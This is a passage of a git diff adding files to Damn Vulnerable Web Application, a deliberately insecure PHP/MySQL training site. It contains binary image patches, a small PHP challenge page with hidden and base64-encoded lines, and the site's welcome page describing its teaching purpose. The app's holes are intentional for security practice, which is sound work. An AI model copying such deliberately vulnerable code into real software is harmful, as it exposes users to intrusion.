    + "; +} + +?> diff --git a/DVWA/favicon.ico b/DVWA/favicon.ico new file mode 100644 index 0000000000000000000000000000000000000000..d8a08d70e38fd3544ad74821e3934a2f6c0f2f67 GIT binary patch literal 1406 zcmeH@*-sNu6vn@+6zfVw#a-)$DDL9EAu6(nbeWb)=XM$fC_zDjMsySkv5ibbYD=Uw zHYUWVgoH?liYPu9B$XKT$r#?$e*{kpC24&0#Rtyh+`l?F%y zkU>cZddet|MmC*I1*3{mD9VSU!~{b@F6`!FaH_e@4Ce&_676<@*v(pq{SP6&d<3!g z0mN=UTu<(!HRwZc&vU$g_Xet`8T?8WoX`AFeJWIM3$EAK!d1q>Wf9za4g6js6!#5` zjs3vqPZ3l~rF6dm742?BA|p_))`6D_;0+fcdm1qObrhq-9W+NU9K^`*2XM&-$>+w$ z@858{QNizDKf&!5ln-{HvoiqEVn8?)oiPCUjslt6@T$KL{x%h2UkJRT1>WXc=xD!- z>T(HOp|^c`0dL3$iQZg)$%X1lCmhi^xD~vv0%Euo;!qcw9tSWqH~?-nf;&pUYh?1~ zGMd^v=;?lnw*#+H<0>N$jW8AFO<6r%Ogr%3I=~WQMuK8&Cg~)NCW$4_ik)Z~n>}al zy!i`KbPH37XxXC0OVXAuTfSoDs?}@OGCf + +1.) Bond. James Bond + +
    \n"; + +$line3 = "3.) Romeo, Romeo! Wherefore art thou Romeo?"; +$line3 = "--LINE HIDDEN ;)--"; +echo $line3 . "\n\n

    \n"; + +$line4 = "NC4pI" . "FRoZSBwb29s" . "IG9uIH" . "RoZSByb29mIG1" . "1c3QgaGF" . "2ZSBh" . "IGxlY" . "Wsu"; +echo base64_decode( $line4 ); + +?> + + diff --git a/DVWA/hackable/uploads/dvwa_email.png b/DVWA/hackable/uploads/dvwa_email.png new file mode 100644 index 0000000000000000000000000000000000000000..22af62f292de46987bc891fe190f97715b754b32 GIT binary patch literal 667 zcmV;M0%ZM(P)4~Te3^nk?5Svg(jxVr$UAcli?MJ@f_ve4cFG{`^|0dtj zYVb3DuQ_ovoD>T(`op%yDdi%ZAZm6+7_^2h^18!5SQOy1vE>aqVM*^hK>dtJltA9> z8aCIVG79BL4*e3B309>$zt^|19QY&o3R6->%?YYjuqA+KU+|(Ti!}wgHtpHA# zI~9M)<$D<>R6zeL&If*(lICTR#t{~z%*a(Y-h`|y3UlVD*5&@ZAi^7s4#}LTWtdic z$>me~us|Z?o{UH2c)ki8{gK)aK}uoz&-|3VBnor3HsVYEwCcn(+a&nTntxP%B7vEg z6@K|35RD%LQ{EDV2*Ys0XMh#?Y$LjPnV5kvvZ!d5-@5N^>URoFPZ8nVw1C`S@WAzK z_}qX>6gJ{=D6tjzq+u%eL z`rm=3oA=pa@h>cQe1T8X^2zwPJr2(vpAP>It#1*#Xt!wcE8YMA002ovPDHLkV1kdQ BN(2A^ literal 0 HcmV?d00001 diff --git a/DVWA/hackable/users/1337.jpg b/DVWA/hackable/users/1337.jpg new file mode 100644 index 0000000000000000000000000000000000000000..5183ae372e1034165b5bfa062c69a1ab4677f163 GIT binary patch literal 3681 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 literal 0 HcmV?d00001 diff --git a/DVWA/hackable/users/admin.jpg b/DVWA/hackable/users/admin.jpg new file mode 100644 index 0000000000000000000000000000000000000000..fb7a9c7368e45c05501114229ea637cb42dca1e3 GIT binary patch literal 3543 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 QLLhVxAl{Z^Pwox<13R#Jg8%>k literal 0 HcmV?d00001 diff --git a/DVWA/hackable/users/pablo.jpg b/DVWA/hackable/users/pablo.jpg new file mode 100644 index 0000000000000000000000000000000000000000..0a9549db9b0e70ace4cd841358779a0acfd97f56 GIT binary patch literal 2961 zcmbW&c{tSH8UXO`EX5b2qA4WH$d+WyR#~EGY`-E@_OUO?h}6h3 z7-ZivO2Z5yGMbrRWV_Svcb|Ko=l*r?ea~~=f6jZ(^M0Q9kF)o2j{@+YH!(8-Kp+4B zu@|s64Hy9&5GWK1;b12Y4h~Kj4;;o0zJ2?+co2L70th|?Lhyj3h@gCQ?v6I?d&h1 zFJEzR$9P=#^z!xz3JwXq9TpxDcRxPi!NbI)KOR5H$b6cWol{s;j4LTEE3bG}k8gP0 z*z~5ky@S}<)lKT@9T^=PpP2kOMV_6b(&iTyzb-AW|6nj#fBxLq{Po)f0w900*!geR zf4C5A7nnU3DD1Zj1isDQ5CoJ%MvYUz&<5rjASkOI0~b1zUQpM@C3oDGF6rE`ZvDfcPZSB;YcuUH7ebIF0b^ejOBQgUppM|yH5zilU7IhYpcTaqMx|H?# zgSK--T+ZS=-b$ea;+~S6>jlZm?3z35;rP^GgIYdUPN=eO#>WSxz;A$kE5_ECO&S|5 z!-{{LqnPj_ckaf`JnhJ#VMCX`W~vn|fpk7@y`Ry~RTNtoeG>VuMjga-K5t~)1|d*u+io>e;FMKo9O3A0zj zI|_E?bq#kL2CjCk>y(ju(O7X#k9-NFC@ra2Fz9t;NVSbX`29?Ktu^~Y4p&p0(~aigHSH@pm&)~)vBlp3=HU*RO$!6{dY z14~4z&Oo$muwXM*mCLIiuasBOZvDH1)jsB^g|uGE4JQh-YX9}?;vPFAdUlRxDfgyi zqfbA+Hi2sy|L(yNt5J>j6m_EOMWg-b-)Aww-p2=RQV5lOEWXTD(i-U(+MWL1&i?(@ z2@+YX*_iDwV4*1?CRaDesCA?FhBpTrCh~B?Sx9|ccw<7*QQ1H}hNL+2 zGq;!kS+(L;7)&lVd>0R==zFihJIl9ErV>@-9s3X19iaf2*XiR(v+u&$P7$sI%c$(K zw_Krei~i8bFS)1dEUjislWurg_h~)~Rr@Xz$VV|avAL<#Yoy)A;1^_-Bs`3pb9Ovb zt!bvNxm~2Yq!*;E0LTO+-N>)GpxvdN@4*!#iY;i5ovEV0I?Ihq7HHe2EoB5}tCDUVJ=cEmMDf(S@Y^NfPCow2?R` zJghQmdB9TrONV+UBXmU+K(zJr4BpITjm&&9tpz7n^z6IlQ-h zf_?pWU*q`6Y zHGz4eoY@4?4Hr(nBOULqY*7Q3cA+Ez3>AN?-M)!q8mt*xF%tH@e8IexVcwIJu`uu3 z%U*=$iJwF#^Q!5q(2tmUgN_~Cb*Vn#7Zj4waz}tPZy1#T(VcGl(C+J@Z0dyJwQ^=L zMPiPSM%~>>{=0AVC*JwaPCOGP(oI{{nEK8cOpymNrmjvULq(!O@E_O6zvf1bhNF~f z9J{J(+afi@eS3-BLjI!O&udIB3q6Dk-K2?c?srdC!2%FG2dTF3-pypQXI*y%N0C__ ze#QNP{4P-=gZR8p(mP?gbgvB8W4WmxX#uREynHdXk%Z76?tn$}!R5%wkIv3-r~ z^&XPFT#XV$DS=v7m=mTo;FW)_j;u4|_#nkZG|Dw^a{_;IzmVihzUSh^`!UkdMK0TI zPg8u%N-lpcR6l9KAZPXX7oP-&o&Ff-9vDTi!dgGW#%qZ z7vub_FzkZD)%mm7$aM6=uz*h8yiqiIB+Y60u0;E+tm}`oyKfcN8nvq$z6`^AuxNE6Ee7)nSp= znkeaE7E*S7*LD9+eJd>@nu3W;`jEXTox%h;VRJcz1cD}#&gizNXqr-0LNr1Llk@qJ z^|?(jscQ6LNhuBQg{#^YZlR|Xh#8)`H>R`Zav zyIomMU)LGKP!KW3LS3P0ch)V2_W;_FFBf;b*x!QPP|ro)k#oqFjIY0Lai`)ztxFrj z#z5GEPTPC<)PpZiYgpwz&m-(87DnqnYdf3K*rOjvI0D+q9=g37Y-7Mv2Uy%vW8{3T WjwbVR2w8J5x8jzJg{)zFQ~v-2O=zD0 literal 0 HcmV?d00001 diff --git a/DVWA/hackable/users/smithy.jpg b/DVWA/hackable/users/smithy.jpg new file mode 100644 index 0000000000000000000000000000000000000000..1b824c76e307f4069afc41750cac3cd2f925602a GIT binary patch literal 4382 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 literal 0 HcmV?d00001 diff --git a/DVWA/index.php b/DVWA/index.php new file mode 100644 index 00000000..9da6f6e7 --- /dev/null +++ b/DVWA/index.php @@ -0,0 +1,47 @@ + +

    Welcome to Damn Vulnerable Web Application!

    +

    Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.

    +

    The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficultly, with a simple straightforward interface.

    +
    +
    + +

    General Instructions

    +

    It is up to the user how they approach DVWA. Either by working through every module at a fixed level, or selecting any module and working up to reach the highest level they can before moving onto the next one. There is not a fixed object to complete a module; however users should feel that they have successfully exploited the system as best as they possible could by using that particular vulnerability.

    +

    Please note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.

    +

    There is a help button at the bottom of each page, which allows you to view hints & tips for that vulnerability. There are also additional links for further background reading, which relates to that security issue.

    +
    +
    + +

    WARNING!

    +

    Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as " . dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' ) . " or " . dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' ) . "), which is set to NAT networking mode. Inside a guest machine, you can download and install " . dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/','XAMPP' ) . " for the web server and database.

    +
    +

    Disclaimer

    +

